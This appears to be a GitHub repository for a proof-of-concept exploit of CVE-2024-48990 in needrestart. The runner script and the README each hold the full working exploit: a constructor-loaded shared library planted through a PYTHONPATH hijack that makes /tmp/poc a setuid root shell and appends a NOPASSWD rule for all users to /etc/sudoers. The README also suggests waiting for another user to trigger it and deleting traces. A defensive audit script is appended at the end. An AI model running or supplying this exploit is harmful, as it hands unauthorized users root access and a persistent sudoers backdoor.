├── images
│   ├── images.md
│   └── usecase.gif
├── runner.sh
└── README.md

/images/images.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/images/usecase.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pentestfunctions/CVE-2024-48990-PoC-Testing/HEAD/images/usecase.gif
--------------------------------------------------------------------------------
/runner.sh:
--------------------------------------------------------------------------------
#!/bin/bash
set -e
cd /tmp
mkdir -p malicious/importlib

# Create and compile the malicious library
cat << 'EOF' > /tmp/malicious/lib.c
/* The scraped copy lost the header names; these are the ones the calls below need */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

static void a() __attribute__((constructor));

void a() {
    if(geteuid() == 0) { // Only execute if we're running with root privileges
        setuid(0);
        setgid(0);
        const char *shell = "cp /bin/sh /tmp/poc; "
                            "chmod u+s /tmp/poc; "
                            "grep -qxF 'ALL ALL=NOPASSWD: /tmp/poc' /etc/sudoers || "
                            "echo 'ALL ALL=NOPASSWD: /tmp/poc' | tee -a /etc/sudoers > /dev/null &";
        system(shell);
    }
}
EOF

gcc -shared -fPIC -o "/tmp/malicious/importlib/__init__.so" /tmp/malicious/lib.c

# Minimal Python script to trigger import
cat << 'EOF' > /tmp/malicious/e.py
import time
while True:
    try:
        import importlib
    except:
        pass
    if __import__("os").path.exists("/tmp/poc"):
        print("Got shell!, delete traces in /tmp/poc, /tmp/malicious")
        __import__("os").system("sudo /tmp/poc -p")
        break
    time.sleep(1)
EOF

cd /tmp/malicious; PYTHONPATH="$PWD" python3 e.py 2>/dev/null
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# CVE-2024-48990-PoC-Testing 🐍🔓

This repository contains a **Proof of Concept (PoC)** for a **vulnerability in the `needrestart` program**: it fails to set Python's module search path correctly, which can lead to privilege escalation. The PoC demonstrates one path to elevated privileges through this flaw.
## ⚠️ Vulnerability Overview

**CVE-2024-48990** lies within the `needrestart` package. Specifically, `needrestart` does not properly set Python's path, which can be exploited to escalate privileges when `needrestart` is triggered by certain actions (such as package installs).

This PoC simulates a scenario where a malicious shared library is loaded via Python to manipulate system settings and gain elevated privileges. Use it in a controlled, safe environment for testing purposes only.

To check if you are vulnerable, run:

```
needrestart --version | grep -q "3.7" && echo "Definitely vulnerable" || echo "Version is potentially not vulnerable, this simply checks for 3.7"
```

Note that this only matches the string `3.7`; it does not prove that other versions are safe.

If you want a vulnerable version to test with, simply run:

```
sudo apt install needrestart=3.7-3
```

---

## ⚡ How to Trigger the Vulnerability

To trigger the vulnerability, execute the following while the listener script is running:

```bash
sudo apt remove ntp; sudo apt install ntp
```

Removing and reinstalling a package (`ntp` in this case) makes apt run `needrestart`, which triggers the issue. Ideally, though, you would wait for another user on the system to run something that triggers `needrestart`, such as `sudo apt update`.

---

## 🔨 Steps to Reproduce

Run the following script to set up the PoC and trigger the vulnerability. You can copy and paste the whole script as is into your terminal and then either wait or trigger it manually with `ntp` as shown above.
It also adds a `sudoers` rule for the binary that applies to all users, for demonstration; realistically you could just have it add a `sudoers` entry for your own user instead, but I wanted to show both:

```bash
#!/bin/bash
set -e
cd /tmp
mkdir -p malicious/importlib

# Create and compile the malicious library
cat << 'EOF' > /tmp/malicious/lib.c
/* The scraped copy lost the header names; these are the ones the calls below need */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

static void a() __attribute__((constructor));

void a() {
    if(geteuid() == 0) { // Only execute if we're running with root privileges
        setuid(0);
        setgid(0);
        const char *shell = "cp /bin/sh /tmp/poc; "
                            "chmod u+s /tmp/poc; "
                            "grep -qxF 'ALL ALL=NOPASSWD: /tmp/poc' /etc/sudoers || "
                            "echo 'ALL ALL=NOPASSWD: /tmp/poc' | tee -a /etc/sudoers > /dev/null &";
        system(shell);
    }
}
EOF

gcc -shared -fPIC -o "/tmp/malicious/importlib/__init__.so" /tmp/malicious/lib.c

# Minimal Python script to trigger import
cat << 'EOF' > /tmp/malicious/e.py
import time
while True:
    try:
        import importlib
    except:
        pass
    if __import__("os").path.exists("/tmp/poc"):
        print("Got shell!, delete traces in /tmp/poc, /tmp/malicious")
        __import__("os").system("sudo /tmp/poc -p")
        break
    time.sleep(1)
EOF

cd /tmp/malicious; clear; echo -e "\n\nWaiting for needrestart execution...\nEnsure you remove yourself from sudoers on the poc file after\nsudo sed -i '/ALL ALL=NOPASSWD: \/tmp\/poc/d' /etc/sudoers\nAs well as remove excess files created:\nrm -rf malicious/ poc"; PYTHONPATH="$PWD" python3 e.py 2>/dev/null
```

## 💥 Cleanup Script

If you'd like to clean up the testing files and remove yourself from `sudoers`, run the following from an elevated prompt:

```bash
sudo sed -i '/ALL ALL=NOPASSWD: \/tmp\/poc/d' /etc/sudoers
rm -rf malicious/ poc; ls
```

---

## 🛠️ Requirements

- **Linux-based system** (Ubuntu/Debian recommended)
- **`needrestart` package** installed (or removed and reinstalled to trigger)
- **Python 3.x** installed (for running the Python script)

---

## 🚨 Warning

This PoC is for **testing purposes only** and should not be used in a production environment. Exploiting this vulnerability in unauthorized environments may be illegal. Always obtain explicit permission before conducting any security testing.

---

## 🔗 Resources

- GitHub Repository: [CVE-2024-48990-PoC](https://github.com/makuga01/CVE-2024-48990-PoC/)
- CVE Details: [CVE-2024-48990](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-48990)

---

Happy testing! 🧪🚀
--------------------------------------------------------------------------------
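Defender-side counterpart to the version check and cleanup steps in the README above: an added shell audit script, not part of this repository, that reports the installed `needrestart` version, checks whether the interpreter scanner has been disabled in its configuration, and looks for the artefacts this PoC leaves behind (a setuid binary under `/tmp` and a `NOPASSWD` sudoers rule pointing into `/tmp` or `/var/tmp`). It assumes a Debian-style system with `dpkg-query`, the configuration file `/etc/needrestart/needrestart.conf` with its `$nrconf{interpscan}` setting, and read access to `/etc/sudoers` (run it as root for the full report).

```shell
#!/bin/sh
# Audit helper for the needrestart CVE-2024-48990 scenario (added example, not
# part of the repository). Assumptions: dpkg-based system, needrestart config at
# /etc/needrestart/needrestart.conf using the $nrconf{interpscan} knob, and the
# PoC artefacts described in the README (setuid /tmp/poc, NOPASSWD sudoers line).

# Print the installed needrestart version, or "not-installed".
needrestart_version() {
    v=$(dpkg-query -W -f='${Version}' needrestart 2>/dev/null) \
        && [ -n "$v" ] && echo "$v" || echo not-installed
}

# Print "yes" if the needrestart config file (arg 1) disables the interpreter
# scanner, i.e. contains "$nrconf{interpscan} = 0;". That scanner is the code
# path that runs Python with a target process's environment, which the PoC
# abuses via PYTHONPATH; a missing or unreadable file yields "no".
interpscan_disabled() {
    grep -Eq '^[[:space:]]*\$nrconf\{interpscan\}[[:space:]]*=[[:space:]]*0[[:space:]]*;' "$1" 2>/dev/null \
        && echo yes || echo no
}

# List regular files with the setuid bit under a directory (arg 1). The PoC
# drops a setuid copy of /bin/sh at /tmp/poc, and nothing legitimate should be
# setuid in a world-writable directory.
setuid_files_under() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# Print uncommented sudoers rules (file in arg 1) that grant NOPASSWD on a
# command under /tmp or /var/tmp, where any user can plant a binary. The PoC
# appends "ALL ALL=NOPASSWD: /tmp/poc".
nopasswd_rules_in_tmp() {
    grep -E 'NOPASSWD:[[:space:]]*/(var/)?tmp/' "$1" 2>/dev/null \
        | grep -Ev '^[[:space:]]*#' || true
}

main() {
    echo "needrestart version : $(needrestart_version)"
    echo "interpscan disabled : $(interpscan_disabled /etc/needrestart/needrestart.conf)"
    echo "setuid files under /tmp:"
    setuid_files_under /tmp
    echo "NOPASSWD rules pointing into /tmp or /var/tmp:"
    nopasswd_rules_in_tmp /etc/sudoers
}

# Only run the report when invoked as: sh audit.sh --run
case "${1:-}" in
    --run) main ;;
esac
```

Any line printed by the last two checks is a finding to remove (the README's cleanup commands do exactly that for the PoC's own artefacts); "interpscan disabled : no" on an unpatched version means the mitigation from the upstream advisory is not in place.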